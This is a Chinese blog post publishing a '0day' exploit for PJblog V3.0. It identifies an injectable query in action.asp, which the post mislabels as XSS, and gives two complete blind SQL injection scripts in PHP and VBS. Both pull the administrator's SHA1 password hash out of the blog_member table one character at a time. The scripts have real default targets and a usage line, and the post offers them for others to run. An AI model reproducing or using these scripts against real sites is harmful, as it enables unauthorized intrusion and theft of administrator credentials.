昨天将自己的博客打上了这个漏洞的补丁,后来身边的朋友们也打上了,现在就把这个XSS漏洞文件和利用代码贴出来,此漏洞可以爆出管理员sha1密码,能不能跑出来就看各位的造化了。
存在漏洞文件:action.asp
第14行:
程序代码set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
PHP利用代码:
程序代码/*
PJblog V3.0 0day exp
code by 小蟑螂&bink
www.0kee.com www.t00ls.net
09.04.22
*/
$url="http://www.pjhome.net"; //注入地址
$var_name="puterjam"; //管理员
$var_key="check_right";
if ($_SESSION["LenI"]){
$LenI=$_SESSION["LenI"];
}else{
$LenI=1;
}
for($i=$LenI;$i<=40;$i++){
if($_SESSION["LenDo"]){
$StaAsc=$_SESSION["LenDo"];
}else{
$StaAsc=31;
}
echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
for($j=$StaAsc;$j<=127;$j++){
$newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
$var_pagelen=file_get_contents($newurl);
$var_newpagelen=strpos($var_pagelen,$var_key);
if($var_newpagelen == true){
$_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
unset($_SESSION["LenDo"]);
$_SESSION["LenI"]=$i+1;
doReload();
break;
}
if($j == $StaAsc+10){
doReload();
break;
}
}
}
if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }
function doReload(){
?>
<script language="javascript">
<!–
window.setTimeout('location.reload()',1000);
//–>
</script>
<?php
}
?>
没有PHP的,还有VBS利用代码:
程序代码WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
WScript.Quit
End If
attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""
If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
WScript.Echo "恭喜!存在漏洞"
Else
WScript.Echo "没有检测到漏洞"
WScript.Quit
End If
For n=1 To 40
For i=1 To 17
strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
If Not IsSuccess(strInject) Then
strResult = strResult & Mid(SHA1Charset, i-1, 1)
Exit For
End If
strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
WScript.StdOut.Write strPrint
Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"
Function PostData(PostUrl)
Dim Http
Set Http = CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
 
; strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function IsSuccess(PostUrl)
strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
IsSuccess = True
Else
IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function
VBS脚本利用方法:
Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/240
